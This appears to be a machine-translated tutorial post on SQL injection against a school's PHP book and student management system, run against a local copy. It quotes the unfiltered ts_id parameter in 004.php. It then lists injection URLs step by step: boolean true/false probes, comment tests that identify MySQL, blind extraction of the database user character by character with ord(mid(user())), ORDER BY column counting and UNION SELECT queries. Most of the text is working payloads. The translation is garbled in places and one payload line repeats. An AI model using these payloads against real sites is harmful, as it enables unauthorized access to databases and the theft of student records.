One of the school's external teachers wrote the program, book + Student management system, filename 001.php,002.php,003.php ... (b) problem out at 004.php number of lines I forgot, too.
<TD width= "118" rowspan= "4" align= "center" valign= "middle" ><a href= "004.php?ts_id=<?php echo $array [ts_id ];? > "> "width=" 136 "height=" 181 "></A></TD><TD width=" "> title:</td>
Pay attention to this sentence <a href= "004.php?ts_id=<?php echo $array [ts_id];? > ">,ts_id without any filtration, naked waiting for us to abuse, hoo~ (although I know everything about the database, but here I still want the black box test)
Let ' S go~
Http://localhost/zhd/004.php?ts_id=1 and 1=1 Normal.
Http://localhost/zhd/004.php?ts_id=1 and 1=2 exceptions
Idiot injected
To judge a database:
Submit Http://localhost/zhd/004.php?ts_id=1/*fenggou
Normal return, description of database Support/* comments, what database support/*? Mysql!
Read user name:
Submit Http://localhost/zhd/004.php?ts_id=1 and Ord (Mid (User (), 1, 1)) =114/*
Normal return, user () is MySQL's built-in function, to view the user, here is the first character to view the user name, yes 114 is the "R" in Accsll, I am the root connection, so the statement is true (this trick to teach me) but if the username is RIJNC, I am not cheated? So in submitting
Http://localhost/zhd/004.php?ts_id=1 and Ord (Mid (User (), 1,1)) =111/* o
Http://localhost/zhd/004.php?ts_id=1 and Ord (Mid (User (), 1,1)) =111/* o
Http://localhost/zhd/004.php?ts_id=1 and Ord (Mid (User (), 1,1)) =116/* t
But if the password is ROOTRIJNC, then I have no words ...
To determine the number of fields:
Submit Http://localhost/zhd/004.php?ts_id=1 ORDER BY 10/*
Failure, the description of the number of fields is less than 10, has been tried to 7 statement was set up, a total of 7 fields, for our future joint query brings great convenience, there is a small skill, first 5, in 10, in 15, in turn, a little narrow range
Federated query:
Know the number of fields directly submitted http://localhost/zhd/004.php?ts_id=1 Union select 1,2,3,4,5,6,7/*
Normal return, the support Union, the statement changed, with and 1=2 let him show the error, hehe ~ ~ ~
Submit Http://localhost/zhd/004.php?ts_id=1 and 1=2 Union select 1,2,3,4,5,6,7/*
